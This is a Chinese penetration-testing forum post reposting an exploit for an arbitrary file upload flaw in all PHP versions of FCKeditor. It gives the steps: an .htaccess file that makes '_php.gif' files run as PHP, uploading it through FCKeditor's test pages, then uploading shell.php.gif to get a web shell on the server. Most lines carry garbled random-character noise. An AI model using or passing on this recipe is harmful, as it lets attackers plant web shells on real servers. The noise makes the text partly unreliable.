中国网络渗透测试联盟

标题: FCKeditor所有php版本Upload上传漏洞 [打印本页]

作者: admin    时间: 2013-10-27 17:25
标题: FCKeditor所有php版本Upload上传漏洞
FCKeditor所有php版本Upload上传漏洞
2 a+ ?# @) A% K  w9 d: s8 E作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07  l3 `; ]. X" \4 ~
减小字体 增大字体, |$ G9 a2 u* p% \* A+ S4 b
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
4 B! Z* y* d0 ][+] Date: 2011
. ^$ t# U/ D7 J# j/ p% b[+] Author : sinesafe.cn
) D, [6 e$ [+ u; @[+] Website : WwW.sinesafe.cn# B2 K5 q( q2 l- J' Y- ~
———————————————————
3 E7 D4 [& ?4 s, m1.create a htaccess file:) n0 f+ n8 |9 P
code:* O% B" h( H# o; l
<FilesMatch “_php.gif”>
' [7 A- ~. p' Q/ u, c$ J6 D5 sSetHandler application/x-httpd-php; d) @0 T& d* _) Y
</FilesMatch>
: y" b. g5 W8 {" e6 E* }# T" v/ Z9 y/ Y1 _5 e
2.Now upload this htaccess with FCKeditor.
6 I* i, e* O+ o4 R* U
1 m1 X6 Y7 v% r( `, Dhttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html( X* S- ]1 s, Q' n5 T; z

/ e0 N4 ~1 @' t% `! g! F+ q$ hhttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html+ B, b/ O- A2 N+ y3 L

. g5 F8 i- y) [" g2 |. v4 s( l———————————————————————————————-
& @" x  n2 `; I, ~3.Now upload shell.php.gif with FCKeditor.
% m: w2 R. X. F! A3 ?2 \) j4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.2 B; ^! {) ]6 ~! U
5.http://www.sinesafe.cn/anything/shell_php.gif, P& c& l" E5 p3 M! i4 U
6.Now shell is available from server.

- o0 U- S. x/ a* G  v+ x$ n- F+ F2 J4 I: y* b! ]7 ?7 {! Q
* ?6 `( V: i7 B" C





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2